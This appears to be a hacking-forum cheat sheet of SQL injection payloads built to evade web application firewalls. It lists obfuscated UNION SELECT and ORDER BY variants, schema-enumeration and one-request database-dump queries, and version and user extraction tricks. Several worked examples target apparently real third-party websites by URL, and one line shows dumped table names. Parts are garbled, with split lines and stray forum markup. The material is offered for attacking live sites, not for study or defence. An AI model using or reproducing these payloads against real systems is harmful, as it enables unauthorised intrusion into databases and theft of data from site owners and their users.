- WAF evasion methods for sql Injections
- I want to share WAF evasion methods for SQL injections. Most are old, but a few are newer. You can get past most of the "404 forbidden" and "NOT Acceptable" errors with these methods.
- 1) id=1+UnIoN+SeLecT 1,2,3 --+
- 2) id=1+UnIOn/**/SeLect 1,2,3 --+
- 3) id=1+UNIunionON+SELselectECT 1,2,3 --+
- 4) id=1+/*!UnIOn*/+/*!sElEcT*/ 1,2,3 --+
- 5) id=1 and (select 1)=(Select 0xAA 1000 more A’s)+UnIoN+SeLeCT 1,2,3 --+
- 6) id=1+%23hihihi%0aUnIOn%23hihihi%0aSeLecT+1,2 ,3 --+
- 7) id=1+UnIOn%0d%0aSeleCt%0d%0a1,2,3 --+
- 8) Id=1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C1,2,3 --+
- /*!fuckU%0d%0aunion*/+/*!fuckU%0d%0aSelEct*/ 1,2,3 --+
- 9) Id=1/*!fuckU%0d%0aunion*/+/*!fuckU%0d%0aSelEct*/ 1,2,3 --+
- div + 0
- Having +1 = 0
- AND+ 1 = 0
- /*!and*/ +1 = 0
- and( 1 )=(0 ) x
- OR false the url query
- id =- 1 union all select
- id =null union all select
- id =1 +and+ false + union +all +select
- id = 9999 union all select
- +union+distinct+select+
- +union+distinctROW+select+
- /**//*!12345UNION SELECT*//**/
- /**//*!50000UNION SELECT*//
- http : //www.phm.ie/project.php?cat=Conservation'
- +and(1)=(0) +union+distinct+select+ 1
- and use: and 1=0 to apear column number in the page
- or
- +div+0
- Having+1=0
- +AND+1=0
- +/*!and*/+1=0
- and(1)=(0)
- Hard WAF bypass tips
- Whitespaces :
- union(select(0),version(),(0),(0),(0),(0),(0),(0),
- (0))
- %0Aunion%0Aselect%0A1,2,3--
- /**/union/**/select/**/1,2,3--
- like ::
- PHP Code:
- http ://www.goavenues.com/
- list_itinerary.php?id=-4%20union
- %20%28select%201,2,version
- %28%29,4,5,6,7,8%29%20--
- =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
- NICE QUERY
- www.zerocoolhf.altervista.org/level2.php?id=-1'union+select*from(select+1)a+join(select'%3Cfont+color=red+font+face=vardana%3EMr_7un47!5%3C/font%3E')b+join+(select+version())c--+
- www.zerocoolhf.altervista.org/level1.php?id=-1'%0AUunioNIOn%0AsELeCT%0A1,VERSION(),3%23
- =-=-=-=-=-=-=-=-=-=-=-=-=-=-
- Bypassing ::
- (Double Keyword): UNIunionON+SELselectECT
- +union+distinct+select+
- +union+distinctROW+select+
- union+/*!select*/+1,2,3
- union/**/select/**/1,2,3
- uni<on all sel<ect
- %20union%20/*!select*/%20
- /**//*!union*//**//*!select*//**/
- union%23aa%0Aselect
- /**/union/*!50000select*/
- /*!20000%0d%0aunion*/+/*!20000%0d
- %0aSelEct*/
- %252f%252a*/UNION%252f%252a /SELECT%252f
- %252a*/
- +%23sexsexsex%0AUnIOn%23sexsexsex
- %0ASeLecT+
- id=1+’UnI”On’+'SeL”ECT’ <-MySQL only
- id=1+'UnI'||'on'+SeLeCT' <-MSSQL only
- like ::
- PHP Code:
- http ://www.goavenues.com/
- list_itinerary.php?id=-4%20union
- %23aa%0Aselect%201,2,version
- %28%29,4,5,6,7,8%20--
- PHP Code:
- http ://www.goavenues.com/
- list_itinerary.php?id=-4%20/**/
- union/*!50000select*/
- %201,2,version
- %28%29,4,5,6,7,8%20--
- PHP Code:
- http ://www.goavenues.com/
- list_itinerary.php?id=-4%20/*!
- 20000%0d%0aunion*/+/*!20000%0d
- %0aSelEct*/%201,2,version
- %28%29,4,5,6,7,8%20--
- =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
- =-=-=-=-=-=-=-=-=-=-=-=-=-=-
- after id no. like id=1 +/*!and*/+1=0
- +div+0
- Having+1=0
- +AND+1=0
- +/*!and*/+1=0
- and(1)=(0)
- =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
- =-=-=-=-=-=-=-=-=-=-=-=-=-=-
- false the url query :
- =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
- =-=-=-=-=-=-=-=-=-=-=-=-=-=-
- id= - 1 union all select
- id= null union all select
- id=1 +and+false+ union+all+select
- id= 9999 union all select
- =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
- =-=-=-=-=-=-=-=-=-=-=-=-=-=-
- Order Bypassing do like this
- =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
- =-=-=-=-=-=-=-=-=-=-=-=-=-=-
- /*!table_name*/
- +from /*!information_schema*/./*!tables*/ where
- table_schema=database()
- =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
- =-=-=-=-=-=-=-=-=-=-=-=-=-=-
- unhex(hex(Concat
- (Column_Name,0x3e,Table_schema,0x3e,table_
- Name)))
- /*!from*/information_schema.columns/*!where*/
- column_name%20/*!like*/char(37,%20112,%2097,
- %20115,%20115,%2037)
- like ::
- PHP Code:
- http ://www.westbury.com/
- article.php?
- article_id=-117%20union%20select
- %201,2,unhex%28hex%28Concat
- %28Column_Name,0x3e,Table_
- schema, 0x3e,table_Name
- %29%29%29,4,5,6,7/*!from*/
- information_schema.columns/*!
- where*/column_name%20/*!like*/
- char%2837,%20112,%2097,%20115,
- %20115,%2037%29--
- user_passwd>westbur6_website>user_info
- =-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
- =-=-=-=-=-=-=-=-=-=-=-=-=-=-
- used with order ::
- convert( using ascii) or unhex(hex())
- like :
- PHP Code:
- www. westbury. com/ article. php?
- article_id =- 117 union select 1 , 2 ,
- convert ( group_concat
- (table_name ) using ascii ), 4 , 5 ,6 , 7 +
- from +information_schema .tables --
- IF'ascii' dosent work? you can try
- PHP Code:
- ujis
- ucs2
- tis620
- swe7
- sjis
- macroman
- macce
- latin7
- latin5
- latin2
- koi8u
- koi8r
- keybcs2
- hp8
- geostd8
- gbk
- gb2132
- armscii8
- ascii
- binary
- cp1250
- big5
- cp1251
- cp1256
- cp1257
- cp850
- ------------------------------Best Bypass WAF------------------------------------
- [~] order by [~]
- /**/ORDER/**/BY/**/
- /*!order*/+/*!by*/
- /*!ORDER BY*/
- /*!50000ORDER BY*/
- /*!50000ORDER*//**//*!50000BY*/
- /*!12345ORDER*/+/*!BY*/
- [~] UNION select [~]
- /*!50000%55nIoN*/ /*!50000%53eLeCt*/
- %55nion(%53elect 1,2,3)-- -
- +union+distinct+select+
- +union+distinctROW+select+
- /**//*!12345UNION SELECT*//**/
- /**//*!50000UNION SELECT*//**/
- /**/UNION/**//*!50000SELECT*//**/
- /*!50000UniON SeLeCt*/
- union /*!50000%53elect*/
- + #?uNiOn + #?sEleCt
- + #?1q %0AuNiOn all#qa%0A#%0AsEleCt
- /*!%55NiOn*/ /*!%53eLEct*/
- /*!u%6eion*/ /*!se%6cect*/
- +un/**/ion+se/**/lect
- uni%0bon+se%0blect
- %2f**%2funion%2f**%2fselect
- union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
- REVERSE(noinu)+REVERSE(tceles)
- /*--*/union/*--*/select/*--*/
- union (/*!/**/ SeleCT */ 1,2,3)
- /*!union*/+/*!select*/
- union+/*!select*/
- /**/union/**/select/**/
- /**/uNIon/**/sEleCt/**/
- +%2F**/+Union/*!select*/
- /**//*!union*//**//*!select*//**/
- /*!uNIOn*/ /*!SelECt*/
- +union+distinct+select+
- +union+distinctROW+select+
- uNiOn aLl sElEcT
- UNIunionON+SELselectECT
- /**/union/*!50000select*//**/
- 0%a0union%a0select%09
- %0Aunion%0Aselect%0A
- %55nion/**/%53elect
- uni<on all="" sel="">/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
- %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
- %0A%09UNION%0CSELECT%10NULL%
- /*!union*//*--*//*!all*//*--*//*!select*/
- union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
- /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
- +UnIoN/*&a=*/SeLeCT/*&a=*/
- union+sel%0bect
- +uni*on+sel*ect+
- +#1q%0Aunion all#qa%0A#%0Aselect
- union(select (1),(2),(3),(4),(5))
- UNION(SELECT(column)FROM(table))
- %23xyz%0AUnIOn%23xyz%0ASeLecT+
- %23xyz%0A%55nIOn%23xyz%0A%53eLecT+
- union(select(1),2,3)
- union (select 1111,2222,3333)
- uNioN (/*!/**/ SeleCT */ 11)
- union (select 1111,2222,3333)
- +#1q%0AuNiOn all#qa%0A#%0AsEleCt
- /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
- %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
- +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
- +union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
- /*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
- +%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
- /*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
- /union\sselect/g
- /union\s+select/i
- /*!UnIoN*/SeLeCT
- +UnIoN/*&a=*/SeLeCT/*&a=*/
- +uni>on+sel>ect+
- +(UnIoN)+(SelECT)+
- +(UnI)(oN)+(SeL)(EcT)
- +’UnI”On’+'SeL”ECT’
- +uni on+sel ect+
- +/*!UnIoN*/+/*!SeLeCt*/+
- /*!u%6eion*/ /*!se%6cect*/
- uni%20union%20/*!select*/%20
- union%23aa%0Aselect
- /**/union/*!50000select*/
- /^.*union.*$/ /^.*select.*$/
- /*union*/union/*select*/select+
- /*uni X on*/union/*sel X ect*/
- +un/**/ion+sel/**/ect+
- +UnIOn%0d%0aSeleCt%0d%0a
- UNION/*&test=1*/SELECT/*&pwn=2*/
- un?<ion sel="">+un/**/ion+se/**/lect+
- +UNunionION+SEselectLECT+
- +uni%0bon+se%0blect+
- %252f%252a*/union%252f%252a /select%252f%252a*/
- /%2A%2A/union/%2A%2A/select/%2A%2A/
- %2f**%2funion%2f**%2fselect%2f**%2f
- union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
- /*!UnIoN*/SeLecT+
- [~] information_schema.tables [~]
- /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
- /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
- /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
- /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
- /*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
- /*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table
- [~] concat() [~]
- CoNcAt()
- concat()
- CON%08CAT()
- CoNcAt()
- %0AcOnCat()
- /**//*!12345cOnCat*/
- /*!50000cOnCat*/(/*!*/)
- unhex(hex(concat(table_name)))
- unhex(hex(/*!12345concat*/(table_name)))
- unhex(hex(/*!50000concat*/(table_name)))
- [~] group_concat() [~]
- /*!group_concat*/()
- gRoUp_cOnCAt()
- group_concat(/*!*/)
- group_concat(/*!12345table_name*/)
- group_concat(/*!50000table_name*/)
- /*!group_concat*/(/*!12345table_name*/)
- /*!group_concat*/(/*!50000table_name*/)
- /*!12345group_concat*/(/*!12345table_name*/)
- /*!50000group_concat*/(/*!50000table_name*/)
- /*!GrOuP_ConCaT*/()
- /*!12345GroUP_ConCat*/()
- /*!50000gRouP_cOnCaT*/()
- /*!50000Gr%6fuP_c%6fnCAT*/()
- unhex(hex(group_concat(table_name)))
- unhex(hex(/*!group_concat*/(/*!table_name*/)))
- unhex(hex(/*!12345group_concat*/(table_name)))
- unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
- unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
- unhex(hex(/*!50000group_concat*/(table_name)))
- unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
- unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
- convert(group_concat(table_name)+using+ascii)
- convert(group_concat(/*!table_name*/)+using+ascii)
- convert(group_concat(/*!12345table_name*/)+using+ascii)
- convert(group_concat(/*!50000table_name*/)+using+ascii)
- CONVERT(group_concat(table_name)+USING+latin1)
- CONVERT(group_concat(table_name)+USING+latin2)
- CONVERT(group_concat(table_name)+USING+latin3)
- CONVERT(group_concat(table_name)+USING+latin4)
- CONVERT(group_concat(table_name)+USING+latin5)
- Group_Concat
- group_concat ()
- /*!group_concat*/ ()
- grOUp_ConCat ( /*!*/ , 0x3e , /*!*/ )
- group_concat (, 0x3c62723e )
- g % 72oup_c % 6Fncat % 28 % 76% 65rsion
- % 28 %29 ,% 22 ~ BlackRose% 22 %29
- CoNcAt ()
- CONCAT (DISTINCT Version ())
- concat (, 0x3a ,)
- concat %00 ()
- % 00CoNcAt ()
- /*!50000cOnCat*/ ( /*!Version()*/ )
- /*!50000cOnCat*/
- /**//*!12345cOnCat*/ (, 0x3a ,)
- concat_ws ()
- concat (0x3a ,, 0x3c62723e )
- /*!concat_ws(0x3a,)*/
- concat_ws ( 0x3a3a3a , version()
- CONCAT_WS ( CHAR ( 32, 58, 32 ), version
- (),)
- REVERSE( tacnoc )
- binary (version ())
- uncompress (compress ( version()))
- aes_decrypt ( aes_encrypt ( version
- (), 1), 1 )[/ b ][/ u ][/ size ][/ color ]
- [~] after id no. like id=1 +/*!and*/+1=0 [~]
- +div+0
- Having+1=0
- +AND+1=0
- +/*!and*/+1=0
- and(1)=(0)
- cp852
- cp866
- cp932
- dec8
- euckr
- latin1
- utf8
- trick to appear info inside img tag
- PHP Code:
- concat( 0x223e3c62723e ,, 0x3c696d
- 67207372633d22 )
- when the column is get into html tag,but its not
- always inside img tag.
- it could be <a> or </noscript> or anything.
- like ::
- PHP Code:
- http ://fzszy.chinacourt.org/
- public/detail.php?
- id=-168' union /*!
- %53elect*/ concat
- (0x223e3c2f613e3c2f74643e,
- version
- (),0x3c6120687265663d22)--+
- [DUMP DB in 1 Request]
- PHP Code:
- ( select (@) from ( select(@:= 0x00 ),
- ( select (@) from ( information_schema . columns) where ( table_schema >=@) and (@) in (@:= concat
- (@, 0x0a , ' [ ' ,table_schema , ' ] >' , table_name , ' > ' , column_name )))) x )
- ( select(@) from ( select (@:= 0x00 ),
- ( select (@) from ( table ) where (@) in (@:= concat
- (@, 0x0a , column1 , 0x3a , column2 )))) a )
- [DUMP DB in 1 Request improve]
- PHP Code:
- ( select(@ x ) from (select (@x := 0x00 ),
- ( select( 0 ) from
- ( information_schema . columns) where
- ( table_schema !
- = 0x696e666f726d6174696f6e5f736368656d61 )and
- ( 0x00 ) in(@ x := concat
- (@ x ,0x3c62723e , table_schema , 0x2e , table_name , 0x3a , column_name )))) x )
- like
- http : //www.marinaplast.com/page.php?
- id=-13 union select 1,2,(select
- (@x)from(select(@x:=0x00),(select
- (0)from(information_schema.colu
- mns)where(table_schema!
- =0x696e666f726d6174696f6e5f736368656d61)and
- (0x00)in(@x:=concat
- (@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),4,5 --
- WHITESPACES BYPASS .
- %09 %0A %0B %0C %0D %A0
- get version - DB_NAME - user - HOST_NAME -
- datadir
- PHP Code:
- version()
- convert( version() using latin1 )
- unhex ( hex( version()))
- @@GLOBAL. VERSION
- ( substr
- (@@version ,1 , 1 )=5 ) :: 1 true 0 fals
- # like #
- www. marinaplast. com/ page . php?
- id =- 13 union select 1 , 2 ,( substr
- (@@version ,1 , 1 )=5 ), 4, 5 --
- 1 it 's mean version 5 and 0 mean version 4
- +and substring(version(),1,1)=4
- +and substring(version(),1,1)=5
- +and substring(version(),1,1)=9
- +and substring(version(),1,1)=10
- # like #
- www.marinaplast.com/page.php?
- id=13+and substring(version
- (),1,1)=5
- download good version 5
- www.marinaplast.com/page.php?
- id=13+and substring(version
- (),1,1)=4
- not download good version 4
- version 5
- id=1 /*!50094aaaa*/ error
- id=1 /*!50095aaaa*/ no error
- id=1 /*!50096aaaa*/ error
- # like #
- www.marinaplast.com/page.php?id=13 /
- *!50095aaaa*/ no error v5
- version 4
- id=1 /*!40123 1=1*/--+- no error
- id=1 /*!40122rrrr*/ no error
- # like #
- www.marinaplast.com/page.php?id=13 /
- *!40122rrrr*/ error not v4
- ☆¸.•*☆ ☆*•.¸☆
- DB_NAME()
- @@database
- database()
- id=vv()
- # like #
- www.marinaplast.com/page.php?
- id=-13 union select 1,2,DB_NAME
- (),4,5 --
- www.marinaplast.com/page.php?id=vv
- ()
- ☆¸.•*☆ ☆*•.¸☆
- @@user
- user()
- user_name()
- system_user()
- # like #
- www.marinaplast.com/page.php?
- id=-13 union select 1,2,user
- (),4,5 --
- ☆¸.•*☆ ☆*•.¸☆
- HOST_NAME()
- @@hostname
- @@servername
- SERVERPROPERTY()
- # like #
- www.marinaplast.com/page.php?
- id=-13 union select 1,2,HOST_NAME
- (),4,5 --
- ☆¸.•*☆ ☆*•.¸☆
- @@datadir
- datadir()
- # like #
- www.marinaplast.com/page.php?
- id=-13 union select 1,2,datadir(),4,5 --
- ☆¸.•*☆ ☆*•.¸☆
- ASPX
- and 1=0/@@version
- ' and 1 =0 /@@ version;--
- ) and 1 =@@version--
- and 1 = 0 /user ;--